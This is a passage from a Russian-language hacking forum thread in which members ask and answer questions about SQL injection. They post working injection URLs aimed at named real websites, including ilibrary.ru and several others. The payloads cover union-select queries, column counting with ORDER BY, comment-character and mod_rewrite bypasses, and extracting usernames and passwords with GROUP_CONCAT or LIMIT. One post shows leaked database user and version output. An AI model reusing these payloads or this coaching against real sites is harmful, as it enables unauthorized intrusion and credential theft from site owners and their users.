Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Corwin

    Corwin Elder - Старейшина

    Joined:
    1 Aug 2008
    Messages:
    0
    Likes Received:
    15
    Reputations:
    0
    пробелы меняем на /**/
     
    2 people like this.
  2. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    R1dex
    Опять торопишься. Там слепая скуль на 4 ветке(может и можно вывод найти, особо не копал), комментарий не критично

    http://ilibrary.ru/text/1320/?p=1+and+substring(version(),1,1)=4
    http://ilibrary.ru/text/1320/?p=1))+order+by+25+--+
    http://ilibrary.ru/text/1320/?p=1))+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*

    По результатам запроса, грузит файл отсюда:
    http://ilibrary.ru/tx2/13/
    Возможно и можно что-то вымутить, но мне лень :)

    Pashkela ай-я-яй :)

    kevmen Я тебя умоляю, пока ненужно давать ответов на вопросы :)
     
    5 people like this.
  3. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    ахахаха... там ведь мод реврайт и все / ситаются разделителями ;)
     
    1 person likes this.
  4. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    581
    Reputations:
    256
    не поможет, тк там mod_rewrite передает все на файл index.phtml, который как раз в REQUEST_URI заменяет = на точку, применяет urlencode и разбивает его на массив по слешам.

    =/ чет запоздал с ответом
     
    #5024 oRb, 28 Jan 2009
    Last edited: 28 Jan 2009
    2 people like this.
  5. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Да там даже вывод есть:

    ilibrary_il@localhost:4.0.27-standard-log:ilibrary_ilibrary («ilibrary_il@localhost»)
     
    2 people like this.
  6. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    В общем путём долгих манипуляций удалось понять какие поля уводят цикл обработки содержания в бесконечный цикл и исключить их, этот запрос даёт нормальный вывод:

     
    3 people like this.
  7. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    А как там вывод определить ? оО
    ЗЫ: А твой метод борьбы я вообще не догнал))
     
    #5027 Велемир, 28 Jan 2009
    Last edited: 28 Jan 2009
  8. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    %23 это ещё один вариант комментария в SQL (#), который у них не фильтруется, кол-во колонок было подобрано с помощью ORDER BY, т.к. одно из 25 полей приводило к бесконечному циклу я сначала во все поля засунул USER и посмотрел где идёт вывод, потом убрал лишние, нашёл поле, которое глючит (24 поле), оставил в нём строку и выставил уважаемым на обозрение...
     
    3 people like this.
  9. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    187
    Likes Received:
    356
    Reputations:
    109
    Code:
    http://ilibrary.ru/search.phtml?q=1%27)+union+select+version(),2,lastname,4+from+autors/*
     
    4 people like this.
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    groundhog да у них ничего не фильтруется, будет работать и +--+ и /*, ты сейчас запутаешь новичков :)

    Просто нужно изначально обращение в обход mod_rewrite
    Тоесть
    http://ilibrary.ru/text/1320/p.1
    =
    http://ilibrary.ru/text/1320/?p=1

    ну и с выводом, конечно молодец, мне терпения не хватило разбираться
     
  11. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    А почему %2523 ? %23 же символ решётки.И ещё: почему скобки )),а не (( ? Ведь при запросе вывод такой:

    )) AND autors.id_a = text_auth.id_a AND texts.id_t = parts.id


    :(
     
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Не %2523, а 25%23. Последний столбец 25 и #

    По поводу скобок внимательно прочитай, что ошибка пишет "неверный синтаксис ВОЗЛЕ ))" тоесть в запросе их нужно закрыть
     
    2 people like this.
  13. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    Блин, ну почему всего этого нету в факе?=(
    Спасибо огромное всем, кто помог - но вывестти столбцы так и не удалось, access denied (
     
    1 person likes this.
  14. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Я читал,но скобки разве не закрываются в противоположную сторону?(Как обычно)

    ascii(substring());

    Но если комментарий работает,то почему он не может просто исключить эти скобки,т.к. они стоят за моим комментарием ?
     
  15. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    А если он закрывает скобки предыдущие,то должно быть ))ID,где ID - какое-то число или символ.

    ЗЫ:Походу,это выше Вели...
     
  16. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    565
    Likes Received:
    309
    Reputations:
    27
    Если ты пытался вывести через INFORMATION_SCHEMA то там 4 ветка и там нет INFORMATION_SCHEMA Database.
     
  17. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    HI,

    Я как-то задавал аналогичный вопрос, но появился еще один.
    Суть такова:
    При выводе данных, выводимая информация ограничена, то есть выводится не вся, через лимит выводится гораздо больше.
    Мне советовали выводить информацию разными способами, один из них:
    GROUP_CONCAT(name,0x3a,pass)+FROM+table+WHERE+ASCI I(lower(name))=97
    то есть вывод юзеров на "a".
    Перебором я выбрал выбрал нужных юзеров, все ОК.
    Теперь вопрос:
    Можно ли сразу вывести данные не через перебор как указано выше?

    Спасибо!
     
    1 person likes this.
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Octave_Parango Вопрос не понятен, тебе в прошлый раз отвечали, что через GROUP_CONCAT выводится определённое количество символов, сколько именно прописано в group_concat_max_len(по умолчанию 1024), и повлиять на это через инъекцию нельзя, можно только фильтровать данные(тоесть выводить с помощью фильтров, нужных тебе). Ты всегда можешь вывести все данные, не используя GROUP_CONCAT, а используя просто лимит.
    name,pass+FROM+table+limit+1,1
    В чём вопрос, попробуй переформулировать
     
    1 person likes this.
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    привет всем, вопросик стоит примерно так : есть сайт и как я думаю скуля хотя по моему слепая... перебором даже version () запрос выдаёт тарабарщину примерно вот так $bAY9<j*
    http://www.fcsteaua.ro/felicitari/tag/-embleme+order+by+100000000000000000000000
    выводит всё на страничку... встречался ли кто нибудь с подобным явлением? Буду очень признателен если мне помогут. Заранее спасибо.
     
  20. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    86
    Likes Received:
    44
    Reputations:
    6
    У меня два вопроса:
    1. где тут вывод полей?
    http://dontime.dn.ua/index.php?new=999999%20union%20select%201,2,3,4,5,6,7,8,9,10/*
    2. как определить количество столбов http://www.aroma-france.info/parfums.php?poll=17%27
     
Loading...
Thread Status:
Not open for further replies.